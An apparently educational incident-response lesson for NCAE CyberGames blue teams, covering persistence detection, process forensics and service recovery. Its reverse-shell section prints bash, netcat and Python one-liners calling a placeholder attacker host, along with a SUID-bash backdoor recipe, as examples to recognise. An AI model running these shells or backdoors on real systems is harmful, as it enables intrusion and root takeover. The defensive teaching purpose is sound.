NCAE: Incident Response Under Fire
The first 15 minutes, persistence detection, and service recovery
Your system has been compromised. An attacker is on your network. Services are going down. You have minutes, not hours. Incident response (IR) is the process of detecting, containing, and recovering from a security breach — while the attack is still happening.
In NCAE CyberGames, red team operators actively attack your network during the competition. They will compromise services, plant backdoors, change passwords, and try to maintain persistent access. Your job is to find what they’ve done, undo it, and keep your services scoring — all under extreme time pressure.
This page teaches the first-15-minutes checklist, the persistence mechanisms attackers most often use, process forensics, and step-by-step service recovery procedures.
Prerequisites: You should be comfortable with file permissions, process management, and basic shell scripting from earlier lessons.
1. What is Incident Response?
Incident response has four phases:
| Phase | Goal | Time |
|---|---|---|
| Detection | Discover that something is wrong | Seconds to minutes |
| Containment | Stop the bleeding — prevent further damage | Minutes |
| Eradication | Remove the attacker’s access and tools | Minutes to hours |
| Recovery | Restore services to normal operation | Minutes to hours |
In competition, all four phases happen simultaneously. You can’t take the server offline to investigate — services must keep scoring. This means you need a systematic approach: check the most impactful things first, fix them fast, and move on.
The single biggest mistake teams make is chasing the attacker instead of fixing services. The scoring engine doesn’t care whether you caught the red team. It cares whether your services are up. Fix first, hunt second.
2. The First 15 Minutes
The first 15 minutes after discovering a compromise determine the rest of the engagement. Run through this checklist in order. Each item has the exact command to use.
Check 1: Unauthorized SSH keys
Attackers add their public key to authorized_keys files so they can SSH in without a password — even after you change passwords. Check every user’s authorized_keys:
# Check all authorized_keys files on the system
for user_home in /home/* /root; do
    if [ -f "$user_home/.ssh/authorized_keys" ]; then
        echo "=== $user_home ==="
        cat "$user_home/.ssh/authorized_keys"
    fi
done
If you see keys you don’t recognize, remove them:
# Remove all unauthorized keys (keep only yours)
echo "ssh-ed25519 AAAA... your@email" > /home/youruser/.ssh/authorized_keys
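Overwriting the file with a single key works when only one key belongs there. When several teammates have keys, one option is to filter the file against an allowlist instead. The sketch below assumes a hypothetical file team_keys.pub (one trusted public key per line) that your team prepared in advance; the function name prune_keys is also made up for illustration.

```shell
#!/usr/bin/env bash
# prune_keys ALLOWLIST TARGET
# Keep only the lines of TARGET that appear verbatim in ALLOWLIST.
# ALLOWLIST (for example team_keys.pub) is a hypothetical file you maintain yourself.
prune_keys() {
    local allowlist="$1" target="$2" kept
    kept="$(mktemp)" || return 1
    # -F: fixed strings, -x: whole-line match, -f: read patterns from a file.
    # grep exits 1 when nothing matches, which is a valid result here.
    grep -Fxf "$allowlist" "$target" > "$kept" || true
    # Keep the original as evidence before changing anything.
    cp -p "$target" "$target.suspect"
    # Write through the existing file so its owner and mode stay the same.
    cat "$kept" > "$target"
    rm -f "$kept"
}
```

Run as root, a call would look like: prune_keys team_keys.pub /home/youruser/.ssh/authorized_keys. Matching is on the whole line, so a trusted key stored with a different comment is dropped as well; check the .suspect copy if a teammate gets locked out.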
Check 2: All crontabs
Cron jobs run on a schedule. Attackers use them to re-establish access, re-open backdoors, or re-download malware:
# Check every user's crontab
for user in $(cut -d: -f1 /etc/passwd); do
    crontab_output=$(crontab -l -u "$user" 2>/dev/null)
    if [ -n "$crontab_output" ]; then
        echo "=== $user ==="
        echo "$crontab_output"
    fi
done
# Check system crontabs
ls -la /etc/cron.d/
cat /etc/crontab
ls -la /etc/cron.daily/ /etc/cron.hourly/
Suspicious signs: cron jobs that download files (wget, curl), run netcat (nc, ncat), or execute scripts from /tmp.
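Reading every cron file by eye is slow when there are many of them. A minimal sketch of a filter for the warning signs just listed follows; the function name suspicious_cron and the exact pattern are assumptions, and a clean result does not prove the files are safe.

```shell
#!/usr/bin/env bash
# suspicious_cron FILE...
# Print file:line:text for cron entries that match the warning signs above.
suspicious_cron() {
    # Tool names matched as whole words, plus paths attackers commonly stage from.
    local pattern='(^|[^[:alnum:]_])(wget|curl|nc|ncat)([^[:alnum:]_]|$)|/tmp/|/dev/shm/|/dev/tcp/'
    grep -HnE "$pattern" "$@" 2>/dev/null
}
```

As root, you might call it as: suspicious_cron /etc/crontab /etc/cron.d/* /var/spool/cron/*. The spool location varies by distribution (/var/spool/cron on RHEL-family systems, /var/spool/cron/crontabs on Debian-family systems).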
Check 3: New user accounts
Attackers create new accounts for persistent access:
# Show all users with UID >= 1000 (human accounts)
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd
# Show all users with UID 0 (root-equivalent)
awk -F: '$3 == 0 {print $1}' /etc/passwd
If UID 0 shows anything besides root, that’s a backdoor account with full root privileges.
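Spotting a new account is easier when you have a list from before the attack. The following sketch saves a baseline at the start of competition and later prints only what changed; the function names and the baseline path are hypothetical.

```shell
#!/usr/bin/env bash
# snapshot_users [PASSWD_FILE]: print "name:uid:shell" for every account, sorted.
snapshot_users() {
    cut -d: -f1,3,7 "${1:-/etc/passwd}" | LC_ALL=C sort
}

# new_accounts BASELINE [PASSWD_FILE]: print entries that are not in BASELINE.
new_accounts() {
    # comm -13 hides lines unique to the baseline and lines common to both,
    # leaving only entries that are new or changed in the current file.
    snapshot_users "${2:-/etc/passwd}" | LC_ALL=C comm -13 "$1" -
}
```

At the start you would run snapshot_users > /root/users.baseline, and during the incident new_accounts /root/users.baseline. Because the UID and shell are part of each entry, an existing account whose UID was changed to 0 or whose shell was switched from nologin to bash shows up too.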
Check 4: SUID binaries
A SUID binary runs with the permissions of its owner, not the user who executes it. If an attacker creates a SUID-root binary, any user can run it and get root access:
# Find SUID binaries outside standard system directories
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'
Legitimate SUID binaries live in /usr/bin, /usr/sbin, /bin, /sbin. Anything in /tmp, /home, /var, or /opt is suspicious.
Check 5: Listening ports
See what’s listening on the network. Unexpected services mean backdoors:
ss -tulnp
Compare against what should be running. If you see something on port 4444, 5555, or any unusual high port — and it’s not one of your services — investigate the process.
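The comparison against "what should be running" can be scripted once you know your own port list. This is a sketch under that assumption: the function name unexpected_ports is hypothetical, and the allowed ports are whatever your team's services actually use.

```shell
#!/usr/bin/env bash
# unexpected_ports PORT...
# Reads `ss -tulnH` output on stdin and prints listeners whose port is not listed.
unexpected_ports() {
    local allowed=" $* "
    awk -v allowed="$allowed" '{
        # Column 5 is Local Address:Port; the port follows the last colon,
        # which also handles IPv6 forms such as [::]:22.
        n = split($5, part, ":")
        port = part[n]
        if (index(allowed, " " port " ") == 0) print port, $1, $5
    }' | sort -u
}
```

For example: ss -tulnH | unexpected_ports 22 53 445 5432. Anything it prints still needs the process lookup from ss -tulnp before you decide it is hostile.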
Check 6: Running processes
ps aux --forest
The --forest flag shows parent-child relationships, which reveals how processes were spawned. Look for:
- Processes running as root that shouldn’t be
- Shell processes (/bin/bash, /bin/sh) with no terminal (TTY column shows ?)
- Processes with suspicious names or running from /tmp
- Netcat (nc, ncat), Python, or Perl processes that look like reverse shells
Check 7: Recently modified files in /etc
find /etc -mmin -60 -type f 2>/dev/null
This shows every file in /etc modified in the last 60 minutes. If the competition just started, any modifications are suspicious. Pay special attention to passwd, shadow, sudoers, and service configs.
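Modification times can be reset with touch, so a time-based search may miss a careful attacker. One complementary approach is a checksum baseline taken before red team is active. The sketch below assumes GNU sha256sum; the function names and the baseline file name are hypothetical.

```shell
#!/usr/bin/env bash
# hash_baseline FILE...: print SHA-256 checksums, to be saved at competition start.
hash_baseline() {
    sha256sum "$@"
}

# changed_since BASELINE: print the files whose contents no longer match.
changed_since() {
    # --quiet hides the "OK" lines, so only mismatched or unreadable files remain.
    sha256sum --check --quiet "$1" 2>/dev/null | sed 's/: [A-Z].*$//'
}
```

A possible use: hash_baseline /etc/passwd /etc/shadow /etc/sudoers /etc/ssh/sshd_config > /root/etc-baseline.sha256 at the start, then changed_since /root/etc-baseline.sha256 whenever you suspect tampering. Legitimate edits by your own team will be listed as well, so refresh the baseline after each intentional change.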
Checkpoint: You find an authorized_keys entry you don't recognize, a cron job that runs wget every 5 minutes, and a new user with UID 0. In what order do you fix these?
Priority order based on severity:
- UID 0 user: this gives full root access. Remove immediately: userdel -r backdoor_user
- authorized_keys: this gives passwordless SSH access. Remove the key now.
- Cron job: this will re-infect you. Remove: crontab -r -u affected_user or delete the file from /etc/cron.d/.
The UID 0 account is most dangerous because it’s root-equivalent. The cron job will undo your fixes if you don’t remove it, but the UID 0 account gives immediate unrestricted access.
3. Persistence Mechanisms
Persistence is how attackers maintain access after initial compromise. They assume you’ll eventually change passwords and restart services — so they plant multiple backdoors that survive these actions.
SSH authorized_keys
How it works: Attacker adds their public key to a user’s ~/.ssh/authorized_keys. Now they can SSH in as that user without knowing the password.
Detection:
# Check all authorized_keys files
find / -name "authorized_keys" 2>/dev/null -exec echo "=== {} ===" \; -exec cat {} \;
Removal: Delete unauthorized keys. Verify by comparing against your team’s known public keys.
Cron jobs
How it works: A cron job runs on a schedule (e.g., every 5 minutes) and re-downloads malware, re-opens a reverse shell, or re-adds the attacker’s SSH key.
Detection:
# All user crontabs
for user in $(cut -d: -f1 /etc/passwd); do echo "--- $user ---"; crontab -l -u "$user" 2>/dev/null; done
# System cron directories
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/
cat /etc/crontab
Removal:
crontab -r -u compromised_user # Remove user's entire crontab
rm /etc/cron.d/suspicious_file # Remove system cron entry
Systemd services and timers
How it works: Attacker creates a systemd service that starts on boot, or a timer that fires periodically. These survive reboots and are harder to spot than cron jobs.
Detection:
# List all enabled services (look for unfamiliar names)
systemctl list-unit-files --state=enabled
# List all active timers
systemctl list-timers --all
# Check for recently created unit files
find /etc/systemd/system/ /usr/lib/systemd/system/ -mmin -120 -type f 2>/dev/null
Removal:
sudo systemctl stop malicious.service
sudo systemctl disable malicious.service
sudo rm /etc/systemd/system/malicious.service
sudo systemctl daemon-reload
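Before deleting a unit it helps to see what it actually runs (systemctl cat malicious.service prints the unit file). To scan many unit files at once, something like the following sketch can flag the obvious cases; the function name suspicious_units and the pattern are assumptions, and a match is a lead to review rather than proof.

```shell
#!/usr/bin/env bash
# suspicious_units UNIT_FILE...
# Print Exec* lines (ExecStart, ExecStartPre, ...) that reference staging paths
# or download tools.
suspicious_units() {
    grep -HnE '^Exec[A-Za-z]*=.*(/tmp/|/var/tmp/|/dev/shm/|/dev/tcp/|wget|curl)' "$@" 2>/dev/null
}
```

For example: suspicious_units /etc/systemd/system/*.service. A unit that launches a renamed binary from an ordinary-looking path will not match, so still read any unit you do not recognize.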
New user accounts
How it works: Attacker creates a new user, sometimes with UID 0 (root-equivalent). Changing the root password doesn’t affect this account.
Detection:
# Users with UID 0 (should only be root)
awk -F: '$3 == 0 {print $1}' /etc/passwd
# Recently created users (high UIDs)
awk -F: '$3 >= 1000 {print $1, $3}' /etc/passwd
# Users with login shells (can SSH in)
grep -v '/nologin\|/false' /etc/passwd
Removal:
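sudo userdel -r backdoor_user
# userdel may refuse a UID 0 account, because running root-owned processes count as "in use".
# In that case, delete the account's lines by hand with: sudo vipw   and   sudo vipw -s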
SUID binaries
How it works: Attacker copies /bin/bash somewhere and sets the SUID bit. Now any user can run it and get a root shell:
# What the attacker does:
cp /bin/bash /tmp/.hidden_shell
chmod u+s /tmp/.hidden_shell
# Now any user runs: /tmp/.hidden_shell -p → root shell
Detection:
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'
Removal:
rm /tmp/.hidden_shell # Delete the binary entirely
# Or remove just the SUID bit:
chmod u-s /path/to/suspicious_binary
Modified .bashrc / .profile
How it works: Attacker adds a command to a user’s .bashrc or .profile. It runs every time that user logs in or opens a new shell.
Detection:
# Check root's and all users' shell startup files
for user_home in /home/* /root; do
    for rc in .bashrc .profile .bash_profile .bash_login; do
        if [ -f "$user_home/$rc" ]; then
            echo "=== $user_home/$rc ==="
            tail -5 "$user_home/$rc"
        fi
    done
done
Look for lines that run netcat, curl, wget, or execute files from /tmp.
Removal: Edit the file and remove the malicious lines.
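Showing only the last five lines misses a command inserted in the middle of a startup file. One alternative is to compare each file with the template in /etc/skel, which useradd copies into new home directories. The sketch below assumes the accounts were created from those templates; the function name rc_drift is hypothetical, and legitimate customizations will be listed alongside malicious ones.

```shell
#!/usr/bin/env bash
# rc_drift SKEL_DIR HOME_DIR
# Print lines present in a user's startup files but absent from the template.
rc_drift() {
    local skel="$1" home_dir="$2" rc
    for rc in .bashrc .profile .bash_profile .bash_login; do
        [ -f "$home_dir/$rc" ] || continue
        if [ -f "$skel/$rc" ]; then
            # In diff's default output, lines marked ">" exist only in the second file.
            diff "$skel/$rc" "$home_dir/$rc" | sed -n "s|^> |$rc: |p"
        else
            echo "$rc: no template in $skel, review the whole file"
        fi
    done
    return 0
}
```

To cover every account: for h in /home/* /root; do echo "== $h"; rc_drift /etc/skel "$h"; done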
Reverse shells
How it works: A reverse shell connects back to the attacker’s machine, giving them a command line. Common variants:
# Bash reverse shell (what the attacker runs on your machine)
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Netcat reverse shell
nc attacker_ip 4444 -e /bin/bash
# Python reverse shell
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
Detection:
# Look for processes with network connections to unexpected IPs
ss -tupn | grep ESTAB
# Look for bash/sh/python processes without a terminal
ps aux | awk '$7 == "?"' | grep -wE 'bash|sh|python[0-9.]*|perl|nc|ncat'
Removal: Kill the process:
kill -9 <PID>
Then find and remove whatever restarts it (cron, systemd, .bashrc).
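To get from an established connection to the PID you need to kill, you can pull the process ID out of the ss output. A minimal sketch, assuming the usual ss -tupn column layout (state in column 2, peer address in column 6); the function name established_pids is made up for illustration.

```shell
#!/usr/bin/env bash
# established_pids: read `ss -tupn` output on stdin and print "PID PEER" for each
# established connection that has an owning process listed.
established_pids() {
    awk '$2 == "ESTAB" && match($0, /pid=[0-9]+/) {
        # RSTART/RLENGTH mark the "pid=NNN" match; skip the 4-character "pid=" prefix.
        print substr($0, RSTART + 4, RLENGTH - 4), $6
    }'
}
```

For example: sudo ss -tupn | established_pids. Without root, ss only shows process details for your own processes, so other users' connections would be skipped.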
Checkpoint: You kill a reverse shell process, but 5 minutes later it's back. What's restarting it?
Something is persisting the reverse shell. Check in this order:
- Cron: crontab -l for all users, check /etc/cron.d/
- Systemd timer: systemctl list-timers --all
- .bashrc/.profile: Check if the reverse shell command is in a startup file (runs on next login)
- Another process: A parent process might be re-spawning it. Check ps aux --forest for parent-child relationships.
The answer is almost always cron. Kill the reverse shell AND remove the cron job.
4. Process Forensics
When you spot a suspicious process, investigate it before killing it. Understanding what it does tells you what else the attacker might have done.
Investigate a running process
# See all processes in a tree (parent-child relationships)
ps aux --forest
Sample output showing a reverse shell:
root      1234  0.0  0.1  12345  6789 ?  Ss  10:00  0:00 /usr/sbin/sshd
root      2345  0.0  0.1  12345  6789 ?  Ss  10:05  0:00  \_ sshd: attacker [priv]
attacker  2346  0.0  0.1  12345  6789 ?  S   10:05  0:00      \_ sshd: attacker@notty
attacker  2347  0.0  0.0   4567  1234 ?  S   10:05  0:00          \_ bash -i
attacker  2400  0.0  0.0   3456   890 ?  S   10:06  0:00              \_ nc 172.16.99.1 4444 -e /bin/bash
This tells the story: someone SSH’d in as “attacker”, opened a bash shell, and started a netcat reverse shell to 172.16.99.1.
Dig deeper with /proc
Every running process has a directory under /proc/<PID>/ containing everything about it:
PID=2400 # The suspicious process
# How was the process started? (full command line)
cat /proc/$PID/cmdline | tr '\0' ' '
# What binary is actually running? (symlink to the executable)
ls -la /proc/$PID/exe
# What files does it have open?
ls -la /proc/$PID/fd/
# What is its working directory?
ls -la /proc/$PID/cwd
# What environment variables does it have?
cat /proc/$PID/environ | tr '\0' '\n'
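Under time pressure it is handy to capture these details in one step so they can go straight into your notes. The following is a sketch only; proc_snapshot is a hypothetical helper, and it relies on GNU stat and readlink.

```shell
#!/usr/bin/env bash
# proc_snapshot PID: print a short evidence record for one process.
proc_snapshot() {
    local pid="$1"
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    echo "pid:     $pid"
    echo "user:    $(stat -c %U "/proc/$pid")"
    # cmdline is NUL-separated; turn the separators into spaces for reading.
    echo "cmdline: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    # readlink fails on processes you may not inspect; fall back to "?".
    echo "exe:     $(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
    echo "cwd:     $(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
}
```

For example: sudo bash -c 'source ./proc_snapshot.sh; proc_snapshot 2400' >> ir-notes.txt (both file names are placeholders). If the exe line ends in "(deleted)", the attacker removed the binary after starting it; while the process is still alive you can usually save a copy with cp /proc/<PID>/exe before killing it.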
lsof — List Open Files
lsof shows all resources a process is using: files, sockets, pipes:
# All resources for a specific process
lsof -p 2400
# Just network connections for a process (-a ANDs the filters; without it lsof ORs them)
lsof -a -i -p 2400
Identifying a reverse shell from ps output
Red flags in ps aux output:
| Sign | What it means |
|---|---|
| ? in the TTY column | No terminal attached: process is running in background, possibly a daemon or backdoor |
| bash -i or sh -i | Interactive shell, suspicious if TTY is ? |
| nc, ncat, socat with an IP | Netcat connecting to a remote host, almost certainly a reverse shell |
| python -c 'import socket...' | Python reverse shell one-liner |
| Process running from /tmp | Binaries in /tmp are always suspicious |
| Unknown username | Account you didn’t create |
The forensics workflow
- Spot it: ps aux --forest and ss -tupn
- Investigate it: /proc/<PID>/cmdline, /proc/<PID>/exe, lsof -p <PID>
- Record it: Write down the PID, command, user, connections (for your team’s notes)
- Kill it: kill -9 <PID>
- Find persistence: What restarts this process? Check cron, systemd, .bashrc
- Remove persistence: Delete the mechanism that relaunches it
Checkpoint: ps shows a process running as root with command "/tmp/.x" and no terminal. /proc/PID/exe points to /tmp/.x. What are your next steps?
- Check what it is: file /tmp/.x (is it a compiled binary, a script, or a known shell?)
- Check connections: lsof -a -i -p <PID> (is it connecting to an external IP? The -a makes lsof combine the two filters instead of listing every network connection on the system.)
- Check /proc/PID/fd: What files does it have open?
- Kill it: kill -9 <PID>
- Remove the binary: rm /tmp/.x
- Find persistence: How did it start? Check cron, systemd timers, .bashrc, and look for a parent process in ps aux --forest.
- Check for more: Attacker may have planted similar binaries elsewhere. Run find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null.
5. Service Recovery Drill
When red team breaks your services, you need to restore them fast. Here are step-by-step recovery procedures for the three most critical services.
SSH Recovery
# Step 1: Check if sshd is running
systemctl status sshd
# Step 2: Restore config from backup (if you made one)
sudo cp /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
# Or restore critical settings manually:
sudo sed -i 's/^PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sudo sed -i 's/^PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config
# Step 3: Fix permissions (sshd is strict about these)
sudo chmod 644 /etc/ssh/sshd_config
sudo chmod 600 /etc/ssh/ssh_host_*_key
sudo chmod 644 /etc/ssh/ssh_host_*_key.pub
# Step 4: Test config syntax
sudo sshd -t
# Step 5: Restart
sudo systemctl restart sshd
# Step 6: Verify
ssh localhost
ss -tulnp | grep :22
PostgreSQL Recovery
# Step 1: Check if PostgreSQL is running
systemctl status postgresql
# Step 2: Restore pg_hba.conf (authentication config)
# This file controls who can connect and how they authenticate
sudo cp /var/lib/pgsql/data/pg_hba.conf.bak /var/lib/pgsql/data/pg_hba.conf
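# Or fix manually. These lines allow local-socket, loopback, and network password auth:
# local all all md5
# host all all 127.0.0.1/32 md5    (needed for the "psql -h localhost" check in step 5)
# host all all 10.0.5.0/24 md5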
# Step 3: Fix ownership and permissions
sudo chown postgres:postgres /var/lib/pgsql/data/pg_hba.conf
sudo chmod 640 /var/lib/pgsql/data/pg_hba.conf
# Step 4: Restart
sudo systemctl restart postgresql
# Step 5: Verify (test a connection)
psql -h localhost -U postgres -c "SELECT 1;"
ss -tulnp | grep :5432
DNS Recovery
# Step 1: Check if named is running
systemctl status named
# Step 2: Restore named.conf from backup
sudo cp /etc/named.conf.bak /etc/named.conf
# Step 3: Restore zone files from backup
sudo cp /var/named/team5.cyber.local.zone.bak /var/named/team5.cyber.local.zone
# Step 4: Validate both configs
named-checkconf
named-checkzone team5.cyber.local /var/named/team5.cyber.local.zone
# Step 5: Fix ownership
sudo chown named:named /var/named/team5.cyber.local.zone
# Step 6: Restart
sudo systemctl restart named
# Step 7: Verify
dig @localhost team5.cyber.local
ss -tulnp | grep :53
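All three procedures share one pattern: restore a backup, validate it, then restart. A generic wrapper can enforce that order and roll back when the restored file fails validation. This is a sketch, not part of any of the tools above; safe_restore and the .broken suffix are hypothetical names.

```shell
#!/usr/bin/env bash
# safe_restore BACKUP TARGET VALIDATOR [ARGS...]
# Copy BACKUP over TARGET, run VALIDATOR, and roll back if validation fails.
safe_restore() {
    local backup="$1" target="$2"
    shift 2
    # Keep the current (possibly tampered) file for rollback and later review.
    if [ -f "$target" ]; then
        cp -p "$target" "$target.broken" || return 1
    fi
    cp -p "$backup" "$target" || return 1
    if "$@"; then
        echo "restored and validated: $target"
    else
        echo "validation failed, rolling back: $target" >&2
        if [ -f "$target.broken" ]; then
            cp -p "$target.broken" "$target"
        fi
        return 1
    fi
}
```

Run as root, usage could look like: safe_restore /etc/ssh/sshd_config.bak /etc/ssh/sshd_config sshd -t && systemctl restart sshd, or safe_restore /etc/named.conf.bak /etc/named.conf named-checkconf && systemctl restart named. The service is only restarted when the validator accepts the restored file.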
The backup lesson
Every recovery procedure above depends on restoring from a backup. Make backups in the first 5 minutes of competition, before red team touches anything:
# Run this FIRST THING in competition
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
sudo cp /etc/named.conf /etc/named.conf.bak
sudo cp /var/named/team5.cyber.local.zone /var/named/team5.cyber.local.zone.bak
sudo cp /var/lib/pgsql/data/pg_hba.conf /var/lib/pgsql/data/pg_hba.conf.bak
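Backups that sit next to the originals with a .bak suffix are easy for red team to find and alter. One option is to also copy them into a single directory that only root can enter. The sketch below assumes GNU cp (for --parents); backup_configs and the destination /root/ir-backup are hypothetical, and an attacker who already has root can still reach the copies.

```shell
#!/usr/bin/env bash
# backup_configs DEST FILE...
# Copy each existing FILE into DEST, recreating its full path underneath.
backup_configs() {
    local dest="$1" f
    shift
    mkdir -p "$dest" || return 1
    chmod 700 "$dest" || return 1
    for f in "$@"; do
        if [ -f "$f" ]; then
            # --parents (GNU cp) keeps the directory structure: DEST/etc/ssh/sshd_config
            cp -p --parents "$f" "$dest/"
        else
            echo "skipped (not found): $f" >&2
        fi
    done
}
```

For example, as root: backup_configs /root/ir-backup /etc/ssh/sshd_config /etc/samba/smb.conf /etc/named.conf /var/lib/pgsql/data/pg_hba.conf. Files that do not exist on a given box are reported and skipped, so the same command can be reused across machines.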
6. The IR Script
This script automates the first-15-minutes checklist. Save it, make it executable, and run it the moment you suspect a compromise:
#!/usr/bin/env bash
# ir-check.sh — First-15-minutes incident response checklist
# Usage: sudo ./ir-check.sh
# No -e here: a check that finds nothing (grep exiting 1) must not abort the rest of the report
set -uo pipefail
echo "=========================================="
echo " INCIDENT RESPONSE CHECKLIST"
echo " $(date)"
echo "=========================================="
echo ""
echo "[1] AUTHORIZED_KEYS FILES"
echo "---"
for home in /home/* /root; do
    [ -f "$home/.ssh/authorized_keys" ] && echo "$home:" && cat "$home/.ssh/authorized_keys"
done
echo ""
echo "[2] CRONTABS (all users)"
echo "---"
for user in $(cut -d: -f1 /etc/passwd); do
    output=$(crontab -l -u "$user" 2>/dev/null) && echo "$user: $output"
done
echo "System cron.d:"
ls -la /etc/cron.d/ 2>/dev/null
echo ""
echo "[3] USERS WITH UID 0 (root-equivalent)"
echo "---"
awk -F: '$3 == 0 {print $1}' /etc/passwd
echo ""
echo "[4] USERS WITH UID >= 1000"
echo "---"
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd
echo ""
echo "[5] SUID BINARIES (non-standard paths)"
echo "---"
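# find often exits non-zero on unreadable or vanishing paths; "|| true" keeps pipefail from printing a false "(none found)"
{ find / -perm -4000 -type f 2>/dev/null || true; } | grep -v -E '^/(usr|bin|sbin)/' || echo "(none found)"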
echo ""
echo "[6] LISTENING PORTS"
echo "---"
ss -tulnp
echo ""
echo "[7] PROCESS TREE"
echo "---"
ps aux --forest
echo ""
echo "[8] RECENTLY MODIFIED FILES IN /etc (last 60 min)"
echo "---"
find /etc -mmin -60 -type f 2>/dev/null || echo "(none found)"
echo ""
echo "[9] ESTABLISHED CONNECTIONS"
echo "---"
ss -tupn | grep ESTAB || echo "(none found)"
echo ""
echo "[10] ACTIVE SYSTEMD TIMERS"
echo "---"
systemctl list-timers --all --no-pager 2>/dev/null
echo ""
echo "=========================================="
echo " CHECKLIST COMPLETE — Review output above"
echo "=========================================="
Make it executable and run it:
chmod +x ir-check.sh
sudo ./ir-check.sh | tee ir-report-$(date +%H%M).txt
The tee command saves the output to a timestamped file while also displaying it on screen. Run this multiple times during competition to track changes.
7. Triage Under Time Pressure
When multiple things are broken and red team is still active, you need a decision framework. Not everything is equally important.
Service priority by scoring weight
| Priority | Service | Weight | Fix first? |
|---|---|---|---|
| 1 | SMB Login | 3x | Always first |
| 2 | SSH | 2x | Second |
| 3 | DNS | 2x | Second (tied with SSH) |
| 4 | Web, FTP, etc. | 1x | After high-weight services |
The triage loop
1. Run ir-check.sh (2 minutes)
2. Fix highest-weight broken service (3-5 minutes)
3. Remove persistence mechanisms found in step 1 (2-3 minutes)
4. Verify services are scoring (1 minute)
5. Go back to step 1
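Step 2 of the loop (pick the highest-weight broken service) can be made mechanical. The sketch below takes the weights from the table above; the port numbers are common defaults and an assumption about your environment, and the names SERVICES and down_by_priority are hypothetical. A listening port does not guarantee the scoring check passes, so treat this as a first filter.

```shell
#!/usr/bin/env bash
# Service table as name:weight:port. Weights come from the scoring table;
# the ports are common defaults and are an assumption about your environment.
SERVICES="smb:3:445 ssh:2:22 dns:2:53 web:1:80"

# down_by_priority "PORT PORT ...": print services whose port is not in the
# given list of listening ports, highest scoring weight first.
down_by_priority() {
    local listening=" $1 " entry name rest weight port
    for entry in $SERVICES; do
        name="${entry%%:*}"
        rest="${entry#*:}"
        weight="${rest%%:*}"
        port="${rest#*:}"
        case "$listening" in
            *" $port "*) ;;                       # port is listening, nothing to report
            *) echo "$weight $name (port $port)" ;;
        esac
    done | sort -s -k1,1nr                        # stable sort keeps table order on ties
}
```

To feed it live data: down_by_priority "$(ss -Hltun | awk '{n=split($5,a,":"); print a[n]}' | tr '\n' ' ')". The first line printed is the service to fix next.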
What NOT to do
| Bad move | Why it fails |
|---|---|
| Chasing red team through logs | You lose points while services are down |
| Rebooting the server | Kills all active sessions — including yours |
| Changing all passwords at once | You lose access before setting up alternatives |
| Installing new software during competition | Wastes time and may break dependencies |
| Panicking and making random changes | Unclear state makes debugging impossible |
What TO do
| Good move | Why it works |
|---|---|
| Fix services before hunting | Points accumulate while you investigate |
| Use your backup configs | 30-second restore vs 10-minute debugging |
| Run ir-check.sh after every fix | Catches re-infection immediately |
| Divide work across team members | One person fixes services, another hunts persistence |
| Document what you find | Build a timeline so you can predict what red team will do next |
Checkpoint: SMB is down (3x weight), SSH is compromised (someone changed the root password), and you found a cron-based reverse shell. You have one person. What do you fix first?
SMB first. It’s worth 3x. Get it scoring by following the quick recovery procedure from the SMB lesson. Then kill the reverse shell and remove the cron job (takes 30 seconds). Then deal with SSH — change the root password back, verify sshd_config, restart. The reverse shell is dangerous, but if you fix SMB and then immediately kill the shell, you’ve minimized both point loss and attacker access.
Exercises
- IR Drill: Set up a practice VM with three backdoors: an authorized_keys entry, a cron job reverse shell, and a SUID bash in /tmp. Run ir-check.sh and identify all three. Remove them in under 5 minutes.
- Process Forensics Lab: Start a fake reverse shell on a practice VM (ncat -e /bin/bash your_ip 4444). From a second terminal, use ps aux --forest, /proc/<PID>/cmdline, /proc/<PID>/exe, lsof -p, and ss -tupn to fully investigate it. Write a one-paragraph forensics report.
- Service Recovery Race: Set up SSH, Samba, and DNS on a practice VM. Have a partner break one service (stop it, corrupt the config, change a password). Time yourself restoring it using only the recovery procedures in this lesson. Target: under 3 minutes.
- Persistence Gauntlet: Have a partner plant 5 persistence mechanisms on a practice VM (one from each category: authorized_keys, cron, systemd service, new user, SUID binary). Find and remove all 5 in under 10 minutes.
Resources
Practice: BlueTeamLabs Online (incident response challenges) · CyberDefenders (forensics and IR)
Reference: NIST Incident Response Guide (SP 800-61) · SANS Incident Handler’s Handbook
Video: John Hammond — IR and forensics · NCAE CyberGames competition walkthroughs